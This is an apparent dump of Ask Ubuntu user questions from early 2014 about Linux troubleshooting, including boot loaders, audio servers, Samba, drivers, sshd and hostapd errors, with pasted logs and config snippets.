; width:1680px ; height:200px ; '' > â < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not in range ( 128 ) ) 2014-01-09 23:40:36,675 - softwarecenter.db.update - info - skipping region restricted app : 'comentarios web ' ( not whitelisted ) 2014-01-09 23:40:37,620 - softwarecenter.db.update - info - skipping region restricted app : 'source code analyzer ' ( not whitelisted ) 2014-01-09 23:40:37,682 - softwarecenter.db.update - info - skipping region restricted app : 'flaggame ' ( not whitelisted ) 2014-01-09 23:40:38,068 - softwarecenter.db.update - info - skipping region restricted app : 'bulleti d'esquerra de calonge i sant antoni ' ( not whitelisted ) 2014-01-09 23:40:40,120 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2014-01-09 23:40:40,120 - softwarecenter.db.database - info - reopen ( ) database 2014-01-09 23:40:40,120 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/rnr.py '' , line 129 , in _on_reviews_helper_data callback ( app , self._reviews [ app ] ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 1050 , in _reviews_ready_callback self.reviews.configure_reviews_ui ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/reviews.py '' , line 284 , in configure_reviews_ui self._fill ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/reviews.py '' , line 208 , in _fill self.useful_votes , is_first_for_version ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/reviews.py '' , line 467 , in __init__ useful_votes ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/reviews.py '' , line 615 , in _build cur_t = self._get_datetime_from_review_date ( review_data.date_created ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/reviews.py '' , line 539 , in _get_datetime_from_review_date return datetime.datetime.strptime ( raw_date_str , ' % y- % m- % d % h : % m : % s ' ) file `` /usr/lib/python2.7/_strptime.py '' , line 325 , in _strptime ( data_string , format ) ) valueerror : time data '2012-05-16t13:19:51.027z ' does not match format ' % y- % m- % d % h : % m : % s'
403232	ubuntu gnome 13.10 enable hibernate	is there a way to enable hibernate in ubuntu gnome 13.10 ? i can do it manually via the terminal but would like to add to power off option if possible . thanks in advance for any help in this matter , bruce
403233	`` starting jack server ... can not connect to server socket err = no such file or directory ''	i am trying to start jack audio server . it works the first time after i restart but then it says `` d-bus : jack server could not be started . sorry '' and i get a long message . do i need to stop pulseaudio or something i have no idea whats going on . here is the message 19:47:17.143 patchbay deactivated . 19:47:17.205 statistics reset . 19:47:17.344 alsa connection change . 19:47:17.449 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . 19:47:17.765 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 19:47:18.016 alsa connection graph change . thu jan 9 19:47:17 2014 : starting jack server ... thu jan 9 19:47:17 2014 : jack server starting in realtime mode with priority 10 thu jan 9 19:47:17 2014 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m thu jan 9 19:47:17 2014 : control device hw:0 thu jan 9 19:47:17 2014 : control device hw:0 thu jan 9 19:47:17 2014 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m thu jan 9 19:47:17 2014 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m thu jan 9 19:47:17 2014 : [ 1m [ 31merror : can not initialize driver [ 0m thu jan 9 19:47:17 2014 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m thu jan 9 19:47:17 2014 : [ 1m [ 31merror : failed to open server [ 0m thu jan 9 19:47:19 2014 : saving settings to `` /home/isaac/.config/jack/conf.xml '' ... 19:48:43.717 d-bus : jack server could not be started . sorry thu jan 9 19:48:43 2014 : starting jack server ... can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started thu jan 9 19:48:43 2014 : jack server starting in non-realtime mode thu jan 9 19:48:43 2014 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m thu jan 9 19:48:43 2014 : control device hw:0 thu jan 9 19:48:43 2014 : control device hw:0 thu jan 9 19:48:43 2014 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m thu jan 9 19:48:43 2014 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m thu jan 9 19:48:43 2014 : [ 1m [ 31merror : can not initialize driver [ 0m thu jan 9 19:48:43 2014 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m thu jan 9 19:48:43 2014 : [ 1m [ 31merror : failed to open server [ 0m thu jan 9 19:48:45 2014 : saving settings to `` /home/isaac/.config/jack/conf.xml '' ... 19:53:20.404 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started thu jan 9 19:53:20 2014 : starting jack server ... thu jan 9 19:53:20 2014 : jack server starting in realtime mode with priority 10 thu jan 9 19:53:20 2014 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m thu jan 9 19:53:20 2014 : control device hw:0 thu jan 9 19:53:20 2014 : control device hw:0 thu jan 9 19:53:20 2014 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m thu jan 9 19:53:20 2014 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m thu jan 9 19:53:20 2014 : [ 1m [ 31merror : can not initialize driver [ 0m thu jan 9 19:53:20 2014 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m thu jan 9 19:53:20 2014 : [ 1m [ 31merror : failed to open server [ 0m thu jan 9 19:53:22 2014 : saving settings to `` /home/isaac/.config/jack/conf.xml '' ... 20:00:01.669 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started thu jan 9 20:00:01 2014 : starting jack server ... thu jan 9 20:00:01 2014 : jack server starting in realtime mode with priority 10 thu jan 9 20:00:01 2014 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m thu jan 9 20:00:01 2014 : control device hw:0 thu jan 9 20:00:01 2014 : control device hw:0 thu jan 9 20:00:01 2014 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m thu jan 9 20:00:01 2014 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m thu jan 9 20:00:01 2014 : [ 1m [ 31merror : can not initialize driver [ 0m thu jan 9 20:00:01 2014 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m thu jan 9 20:00:01 2014 : [ 1m [ 31merror : failed to open server [ 0m thu jan 9 20:00:03 2014 : saving settings to `` /home/isaac/.config/jack/conf.xml '' ... 20:00:15.363 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 20:03:31.537 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started thu jan 9 20:03:31 2014 : starting jack server ... thu jan 9 20:03:31 2014 : jack server starting in realtime mode with priority 10 thu jan 9 20:03:31 2014 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m thu jan 9 20:03:31 2014 : control device hw:0 thu jan 9 20:03:31 2014 : control device hw:0 thu jan 9 20:03:31 2014 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m thu jan 9 20:03:31 2014 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m thu jan 9 20:03:31 2014 : [ 1m [ 31merror : can not initialize driver [ 0m thu jan 9 20:03:31 2014 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m thu jan 9 20:03:31 2014 : [ 1m [ 31merror : failed to open server [ 0m thu jan 9 20:03:33 2014 : saving settings to `` /home/isaac/.config/jack/conf.xml '' ...
403234	how do i set documentroot/directory path in xampp httpd.conf to usb flash folder ?	i use lubuntu 13.10 with xampp for linux 1.8.3 and my usb flash is fat32 formated . when i try to set xampp configuration file /opt/lampp/etc/httpd.conf : < directory / > order allow , deny allow from all < /directory > documentroot `` /media/username/usb_flash/www '' < directory `` /media/username/usb_flash/www '' > options indexes followsymlinks execcgi includes allowoverride all require all granted < /directory > i get : access forbidden ! you do n't have permission to access the requested directory . there is either no index document or the directory is read-protected . error 403
403240	theme folder - can not access permissions	i am very new to ubuntu and could n't find a straight forward answer or solution to this : i 'm running ubuntu gnome 13.10 and i have installed tweak tool . running fine . i 've downloaded the mediterraneannight series 2.03 theme and extracted it to the desktop . i have enabled viewing of hidden files and located /usr/share/themes , i can see the existing theme files located inside : adwaita , highcontrast etc the problem - i can not drag and drop the newly extracted theme into the theme folder . i have located the permissions tab via theme folder properties , this indicates owner and group as root , others has no value . all three drop-downs are transparent/faded and inaccessible . 'you are not the owner , so you can not change these permissions ' . how can i solve this please ? thanks
403242	compat driver compile errors	when i compile compat drivers for atheros ar9485 in ubuntu 13.10 with the make command , it gives me these errors : dilip @ ubuntu : ~/compat-drivers-3.7-rc1-3 $ make make -c /lib/modules/3.11.0-15-generic/build m=/home/dilip/compat-drivers-3.7-rc1-3 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-15-generic' cc [ m ] /home/dilip/compat-drivers-3.7-rc1-3/compat/main.o ld [ m ] /home/dilip/compat-drivers-3.7-rc1-3/compat/compat.o cc [ m ] /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.o in file included from /home/dilip/compat-drivers-3.7-rc1-3/include/linux/bcma/bcma.h:8:0 , from /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/bcma_private.h:8 , from /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:8 : /home/dilip/compat-drivers-3.7-rc1-3/include/linux/bcma/bcma_driver_pci.h:217:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_core_pci_init’ extern void __devinit bcma_core_pci_init ( struct bcma_drv_pci *pc ) ; ^ in file included from /home/dilip/compat-drivers-3.7-rc1-3/include/linux/bcma/bcma.h:10:0 , from /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/bcma_private.h:8 , from /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:8 : /home/dilip/compat-drivers-3.7-rc1-3/include/linux/bcma/bcma_driver_gmac_cmn.h:95:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_core_gmac_cmn_init’ extern void __devinit bcma_core_gmac_cmn_init ( struct bcma_drv_gmac_cmn *gc ) ; ^ in file included from /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:8:0 : /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/bcma_private.h:25:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_bus_register’ int __devinit bcma_bus_register ( struct bcma_bus *bus ) ; ^ /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:169:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_bus_register’ int __devinit bcma_bus_register ( struct bcma_bus *bus ) ^ /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:18:21 : warning : ‘bcma_bus_next_num’ defined but not used [ -wunused-variable ] static unsigned int bcma_bus_next_num = 0 ; ^ /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.c:94:12 : warning : ‘bcma_register_cores’ defined but not used [ -wunused-function ] static int bcma_register_cores ( struct bcma_bus *bus ) ^ make [ 3 ] : *** [ /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma/main.o ] error 1 make [ 2 ] : *** [ /home/dilip/compat-drivers-3.7-rc1-3/drivers/bcma ] error 2 make [ 1 ] : *** [ _module_/home/dilip/compat-drivers-3.7-rc1-3 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' make : *** [ modules ] error 2 how can i fix this ?
403247	ubuntu 12.04 - bcm4312 - 14e4:4315 drivers problem	for some days now i am trying to configure aircrack-ng on my system and i am not able to do so.the closest thing i have come to now is : use wlan card as normal but not being able to put it in monitor mode ( sudo aircrack-ng start eth1 ( yeah when i switch to the wl driver , wlan0 becomes eth1 ) ) using wl ( broadcom sta ) driver card ca n't detect any networks , monitor can be switched on and off using b43 i have tried using different versions of b43-fwcutter , broadcom-wl and firmware-b43-installer ( firmware-b43-lpphy-installer ) , but with no success . i am hoping that someone can help me to be able to use my card as normal and to be able to crack networks ( i have done it with backtrack ) my system : os : ubuntu 12.04.03 pci-id : 14e4:4315 chip-id : bcm4312 modes : b/g phy version : lp ( r1 ) supported : yes ( 2.6.33+ ) alternative : wl $ uname -a linux exstation 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:28:45 utc 2013 i686 i686 i386 gnu/linux $ sudo lspci -vvn|grep 43 -a7 10:00.0 0280 : 14e4:4315 ( rev 01 ) subsystem : 103c:137d control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at dc000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 tell me if you need any more info .
403249	configuring mod_wsgi module	im trying to follow up the below link to configure mod_wsgi in apache ... most of the steps were successfull and trying to start `` loading module in apache '' step . http : //code.google.com/p/modwsgi/wiki/quickinstallationguide # apache_requirements im trying to add this line to httpd.conf file but when i checked the file under /etc/apache2/ it is empty..not sure if im missing anything ... loadmodule wsgi_module modules/mod_wsgi.so
403250	windows 8 and ubuntu 12.04lts dual boot issues	i 've searched through here and have tried to fix this issue but nothing seems to work . i recently installed ubuntu on my hp pc that came with windows 8 pre-installed via uefi . i 'm new to ubuntu and linux all together but i would really like to learn . so during the installation i chose to `` install alongside windows . '' after completing the installation the option to choose windows 8 would not work . i had to have use system setup and go into the boot options and select windows boot loader . so i searched and saw that i should run boot-repair and so i did . well after that it added numerous other options in grub . i can choose windows boot uefi and it will load windows . now , though when i select ubuntu it wo n't boot . it just stays on a blank purple screen . i can only boot into ubuntu if i have the liveusb plugged in . what should i do ? i just want to be able to choose between windows and ubuntu and they both work . here 's this if it helps.. http : //paste.ubuntu.com/6723512
403252	samba file share permissions issue	i have a quick question in regards to samba share . i have recently built an ubuntu server and moved all my previous windows ntfs hdd into the server . my goal is to share all 4 hdd to utilize on my other windows machines and to share through plex media server . i have shared the hdd through ubuntu but i ca n't change permissions and even when trying to manually configure through smb.conf i ca n't get the permissions to successfully change . i have attached what i have configured in the smb.conf . any help would be greatly appreciated . here is the rest of the smb.conf for reference . [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) wins support = yes dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # security = user encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user # ======================= share definitions ======================= realm = localdomain server role = domain controller server services = +smb -s3fs dcerpc endpoint servers = -winreg -srvsvc [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # ross 's shares [ share ] comment = home path = /home/roce/downloads browsable = yes guest ok = yes read only = no create mask = 0777 [ share ] comment = sdb - data path = /home/roce/data browsable = yes guest ok = yes read only = no create mask = 0777 [ share ] comment = sdc - movies path = /home/roce/movies browsable = yes guest ok = yes read only = no create mask = 0777 [ share ] comment = sdd - tv shows path = /home/roce/tv shows browsable = yes guest ok = yes read only = no create mask = 0777 [ share ] comment = sde path = /home/roce/data browsable = yes guest ok = yes read only = no create mask = 0777 [ sysvol ] path = /var/lib/samba/sysvol read only = no [ netlogon ] path = /var/lib/samba/sysvol/localdomain/scripts read only = no
403254	windows 7 not in boot menu	i got lubuntu and i created 3 partions 1 swap 1 lubuntu 1 windows i turn my lap top on and i got the boot menu and i look for windows 7 nothing just lubuntu help i need windows too what an i do ? i got a toshiba satellite c855-s5203 with 2 gb ram i have checked in the drive application and windows dose not show up i have a school projects coming up
403256	pogo.com games wo n't work , says outdated java	i am trying to get my ubuntu 12.04 laptop to be able to run games on pogo.com first none of the games on pogo would work because of outdated flash . then i learned of google chrome with pep flash and some of the games would work but not all of them due to outdated java . i have iced tea plugin for my chrome but have no idea what versions of java it supports . i need java7 to run the pogo online games , so i tried to install openjdk7 but it would not show up on my chrome plugins . if anyone could help me figure out this problem it would be much appreciated . also , i am using chromes newest download straight from google , with iced-tea 1.2.3 .
403257	how to work ipod with ubuntu 13.10 , do i need to format ?	i had to switch to ubuntu after windows 8 basically blocked itself out on christmas day but since then i have n't able to add music to my ipod , it 's even made some songs not play thought that might be cause it was plugged into my ps3 ? ? is there anyway to add music to my ipod ? i 've heard some say i need to format on windows which i can do on my sister 's laptop but i want to know before i do that will work for sure . i 'm on ubuntu 13.10 in case you did n't notice the title . i 've tried banshee and rhythmbox though i 've heard negative things about rhyhmbox . all help is appreciated : )
403263	ubuntu login password	i have just installed ubuntu linux 12.04 and it asks for a password initially , what is the password i need to use ? i tried `` root '' and `` toor '' as in backtrack but this is not correct .
403267	terminal in cat mode says -s : command not found	awhile ago i was installing something and doing some stuff with terminal , and i think i messed it up . on the terminal app it says `` terminal - cat - 80x24 '' then inside terminal it says : last login : wed jan 1 14:05:47 on ttys000 -bash : [ [ -s : command not found is there a way to reinstate my terminal to original settings ? thank you !
403271	ubuntu 13.10 error installing grub- dual boot w/ windows 8 separate disks	i am basically completely new to linux , so i do not have a lot of terminology knowledge right here . i built my computer last year and have a 120gb sdd where windows 8 64bit is installed along with a couple programs like chrome and a 1tb hdd where my games , documents , etc . are kept . i shrunk my hdd by 40gb , created a bootable usb for ubuntu , and booted into the flash drive . i selected the free space and created a 25gb / partition and then made the rest a partition for swap . at the end of installation , i got an error saying that it could not install grub . after trying other drives , i just chose to skip installing the bootloader and look for help online . using my live disk , after trying root @ ubuntu : ~ # grub-install -- root-directory=/mnt /dev/sda i got the error /usr/sbin/grub-bios-setup : warning : this gpt partition label contains no bios boot partition ; embedding wo n't be possible . /usr/sbin/grub-bios-setup : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-bios-setup : error : will not proceed with blocklists . i then tried root @ ubuntu : ~ # sudo mount -t ext4 /dev/sdb2 /mnt root @ ubuntu : ~ # sudo mount -- bind /dev /mnt/dev root @ ubuntu : ~ # sudo mount -- bind /proc /mnt/proc root @ ubuntu : ~ # sudo cp /etc/resolv.conf /mnt/etc/resolve.conf root @ ubuntu : ~ # sudo chroot /mnt root @ ubuntu : / # grub-install -- force /dev/sda and got the error message /usr/sbin/grub-bios-setup : warning : this gpt partition label contains no bios boot partition ; embedding wo n't be possible . /usr/sbin/grub-bios-setup : error : embedding is not possible , but this is required for cross-disk install . also , here 's my disk list : disk list in terminal i really have no idea how to solve whatever issue it is that i have . i 've seen people having problems with windows 8 installing in uefi mode , but i am not sure how to check if i did that and if so , what to do . thanks for helping a nub .
403274	help ! windows 7 lodaer corrupt/error	http : //paste.ubuntu.com/6724788 thats my summary after boot repair so when i start the computer theres 4 choice or 5 i dont remember ubuntu windows 7 loader sda1 windows 7 loader sda 2 ( something ) im trying to log into my windows.. but whenever i chose any of the 7 loader it just throw me to an error screen where i can press esc to restart the pc or enter to do nothing please help i can not get back to windows in this dual boot . this is very very urgent edit : for further details you can check my previous question here something wrong with my dual boot install attempt
403278	where do i get display drivers for viewsonic va1948m-led ?	i have a viewsonic va1948m-led display and ubuntu does not recognize the display so i only get two resolution choices .
403279	sshd wo n't stop/start properly	i am running ubuntu 13.10 ( fresh install ) . i have installed openssh-server . during the process of trying to troubleshoot a problem with logging in via ssh from another linux system ( also running ubuntu ) i discovered that stopping and starting the server do n't seem to work properly . i have googled the problem extensively and found many ( sometimes conflicting ) answers . below are the results for the four methods i have found root @ newton : ~ # invoke-rc.d ssh stop initctl : unknown job : ssh root @ newton : ~ # service ssh stop stop : unknown job : ssh root @ newton : ~ # /etc/init.d/ssh stop root @ newton : ~ # root @ newton : ~ # stop ssh stop : unknown job : ssh in no case do i get feedback that indicates the daemon stopped . the same goes for trying to start the daemon . when i look at /var/log/auth.log i see that the daemon apparently stopped multiple times but not because of the above commands . it only stops when i kill it using killall sshd . after which it immediately restarts . somehow something appears to be completely broken with my system . does anyone have any ideas on how to sort it out ? thanks for any help .
403283	egistec es603 fprin_demo shows no device found	on ubuntu 12.04 lts amd64 i have used the following commands to get fprint_demo . sudo apt-get install libfprint0 fprint-demo libpam-fprint gksu-polkit wget `` http : //etes603.googlecode.com/files/libfprint0_20110418git-2build1_amd64.deb '' sudo dpkg -i libfprint0_20110418git-2build1_amd64.deb bus 003 device 010 : id 1c7a:0603 lightuning technology inc. is for finger print device after lsusb . i have used sudo chmod a+rw /dev/bus/usb/003/010 then i have typed fprint_demo on terminal . then a gui for fprint demo appears . but it says no devices found i have also tried sudo gedit /etc/udev/rules.d/90-egis.rules and added the following content ( on one line ) : subsystem== '' usb '' , action== '' add '' , attr { idvendor } == '' 1c7a '' , attr { idproduct } == '' 0603 '' , mode= '' 0666 '' but still device is not found . am i missing something . i 'm a very beginner of finger print device . please suggest me what to do . thanks in advance .
403284	how to install umtsmon ?	i have a 3g usb network adapter from sun cellular and it runs very slow at a rate of about 3kb/s . i read about umtsmon which people on the forums have stated brings that slow 3kb/s up to 60 kb/s . i ca n't install it in ubuntu however because there are no current packages for ubuntu or any other modern linux version . how can i install umtsmon on ubuntu 13.10 ? my usb broadband modem is the one touch x230 - 7.2 mbps
403286	unable to mount 63gb file system	error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda5 /media/92441ec8441eaf4b what to do to repair this ?
403288	ubuntu compatibility with dell inspiron 7537 ?	i recently bought a dell inspiron 7537 laptop and i was wondering if i will successfully be able to install ubuntu on this system . i have read about problems with laptops newer than 2012 and issues with secure boot and uefi and i just want to make sure . i am reluctant to give it a try if there is a chance that i might break my laptop ( i need it for school ) . the specs are as follows : https : //drive.google.com/file/d/0b1owlumsdrscsmvpwfjknlvfzhc/edit ? usp=sharing also if anyone could provide me with a bit of guidance . again i would really like to preserve the usability of my laptop so that i do n't break it . thanks ! edit : after a painstaking amount of research , i finally managed to install it safely . i will probably be writing a blog post talking about everything i learned !
403294	i need help with ubuntu 12.04 chrome browser	i have installed ubuntu on my laptop which also has windows 7 , windows is so terribly slow which is the reason i installed ubuntu . i am using chrome browser on ubuntu but when i am on facebook , chrome crashes with the 'he 's dead jim ' message . is there a way of fixing this ? my daughter uses ubuntu on a laptop with the same rubbish spec as mine and she has no problems but she does n't have windows only ubuntu , could this be the problem ? i.e . windows keeping hold of memory which ubuntu needs ? as you can probably tell , i am not very technical so if anyone replies please try and keep it simple enough for me to understand . thanks .
403296	how to print more than 100 copies ?	i have a label printer , which i use to create stickers for bread bags for my small business . i often print 500-800 labels at once , but in ubuntu the maximum number of pages is limited to 100 . how to increase this number ?
403297	where can i configure themes ? ! and how ? !	i am using adwaita theme and i love it but i just wanted to do some changes in some colors highlights and graphics . yes i can install compizconfig and other software , but i want to understand a little bit about the files management and things like that . so what i want in particular is where are the files ( directories ) in which i can configure the themes ? second where can i find more technical and programming information about the themes and things related . thanks in advance .
403298	all photos open in pink-black ( combination ) color in my ubuntu	when i click on any photo ( any image file formats ) ( stored in my computer ) to view , it does n't open with original colour . the photo opens with combination of pink-black colour . mostly pink colour is all-over the picture . the photo is by default open in gnome image viewer i tried with : opening a photo with different photo viewers like : f-spot photo viewer , shotwell photo viewer etc . uninstalled and reinstalled photo viewers all gives me the same result ( with pink-black color ) . my system details : ubuntu 12.04.3 lts gtk version : dpkg -l libgtk2.0-0 libgtk-3-0 ( command i used ) ii libgtk-3-0 3.4.2-0ubuntu0.5 gtk+ graphical user interface library ii libgtk2.0-0 2.24.10-0ubuntu6 gtk+ graphical user interface library please help me solve this issue . please let me know if i can provide more information . thanks .
403300	mozilla installation issue	when i am installing firefox using apt-get command it throwing this error : failed to fetch http : //ppa.launchpad.net/mozillateam/firefox-next/ubuntu/pool/main/f/firefox/firefox_27.0~b2+build1-0ubuntu0.12.04.1_amd64.deb size mismatch is there anyone who can help . thanks in advance .
403306	unity launcher shows nothing after upgrade	i upgraded ubuntu 13.04 to ubuntu 13.10. but my unity launcher shows nothing . my unity launcher does n't have any app luncher tab . how to solve it ?
403307	playing midi files in totem on 13.10	in previous versions of ubuntu , playing midi files `` just worked '' ; totem would open and play them . however , ever since i upgraded to saucy it can no longer do this ; instead it generates an error about a missing plugin . i 've heard of some command line workarounds , but is there any way to make it just work as it did in earlier versions ?
403308	package dependencies can not be resolved when installing codeblocks	whenever i try to install codeblocks i get this error : the following packages have unmet dependencies : codeblocks : depends : codeblocks-common ( = 12.11-3 ) but it is not going to be installed
403312	what exactly is gnupg ?	i understand what a public and private key pair are . you can encrypt and decrypt a data stream using the public and private key pair . but i have a few questions . do the public and private key only work in conjunction with each other ? what is a keyring ? what is key signing and how does it work ? if i encrypt a message with a key , does it implicitly mean i also signed it ? after all , only the other key pair can decrpyt it and this key pair is in my possession . and how does gnu pg fit into all of this ? from what i read , it seems like gnu pg manages all you public and private key pairs . is that true ? sorry , if the questions seem very basic .
403313	thunar - can i change the sorting method for one specific folder ?	xubuntu 13.10 thunar 1.6.3 is it possible to change the sorting method for one specific folder only ?
403314	i 've got the following error on booting and then after login	i 've got the following error on booting and then after login ... . first while i 'm booting i 've got a message that says something about my graphics card ? that it does n't support unity ? etc after i login succesfully i got some other messages . this is obviously a bug . also you should remove by default one effects on compiz that windows that are not responding are grayed ! ! this effect has bugs too because it grays windows that are active ! ! ! ! and thus frozing them without a reason . i tried to disable this effect and everything is fine . it gives me the sense that i 'm using an alpha version i ca n't believe how disoriented canonical is . at least we have the ubuntu derivatives , xubuntu lubuntu etc i 'm only using them right know .
403316	how do i enable/disable compiz plugins from command line in ubuntu 13.10 ?	i followed this question , but the answer given in that question only works on ubuntu 11.04 and 11.10 and no longer works on ubuntu 13.10 . so my question is , how do i enable or disable a particular compiz plugin from terminal in ubuntu 13.10 ?
403320	ca n't type backslash in ubuntu	i 've just finished installing ubuntu 12.04 and installed the missed language packages but i strangely ca n't type backslash as i used to use the button above the windows button , ca n't figure out what the problem is and i use this button a lot in programming using eclipse , so what is the problem ? thanks in advance
403321	how do i check if a gpt or mbr partition table is being used ?	i understand that gpt ( guid partition table ) is the newer partition table format , and that it supports having many primary partitions . how can i check if a gpt or mbr partition table is being used ?
403324	is there an application that allows people to share real objects ?	for example , if i have a load of useful stuff , to be able to list it and allow other users with an account , to be able to see what i have and request to borrow it . like a peer-to-peer library . i 'm not talking digital sharing , i am talking physical object sharing . users can flag something as available or currently on loan in their personal library .
403327	install pecl packages on ubuntu	i 've tried it a 100 times i 'm really new to ubuntu and ended with a bunch of error that i do n't even understand can any one please help me ? ? here is what i did : i installed php i installed libcurl then php5-dev i tried installing pecl extension and it says phpize not found .
403331	asus bu400a right touch pad button not working	i have an asus bu400a with ubuntu 12.04 installed , but i ca n't execute right clicks using the right button under the touchpad . when i run xev , the right button gets detected as an event , but the right button is not detected . oddly enough , when i touch the bottom left corner of my touchpad and do a left click , a left click is detected . i have no problems when i use an external mouse .
403334	hostapd gives error nl80211 : register action command failed : ret=-19	i 'm trying to get hostapd working on a rt3290 ( pci-based ) network adapter , and a ubuntu 12.04.3 lts release . i use the approach taken in how to setup a wi-fi hotspot ( access point mode ) ? i verified with the `` iw list '' command that it has ap mode for acting as a access point . when starting the hostapd daemon , i get the following error : # sudo hostapd -d /etc/hostapd/hostapd.conf configuration file : /etc/hostapd/hostapd.conf nl80211 : register action command failed : ret=-19 ( no such device ) nl80211 : register action match - hexdump ( len=1 ) : 06 nl80211 : failed to register action frame processing - ignore for now nl80211 : add own interface ifindex 0 could not read interface wlan0 flags : no such device nl80211 driver initialization failed . eloop : remaining socket : sock=4 eloop_data=0x8a5b900 user_data=0x8a5bea0 handler=0x807c5e0 eloop : remaining socket : sock=6 eloop_data=0x8a5dd30 user_data= ( nil ) handler=0x8086770 what can be wrong with this set-up ?
403338	problem with nfs client not seeing changes	i have an ext4 hard drive mounted and working correctly except that if i add a file or folder to the mount on the server , i ca n't see the changes on the client unless i reboot the client . i.e . the client does n't know/see the changes to the mount . fstab : server : /mnt/hdd /home/jesse/mnt/hdd nfs4 _netdev , auto 0 0 files permission are good as i can read and write without any problems . any ideas ?
403340	netbeans not locating android sdk	i am not able to locate android sdk directory for netbeans . how can i integrete android to netbeans in ubuntu 12.04 . i have already installed the sdk , but not able to locate it with netbeans .plz help
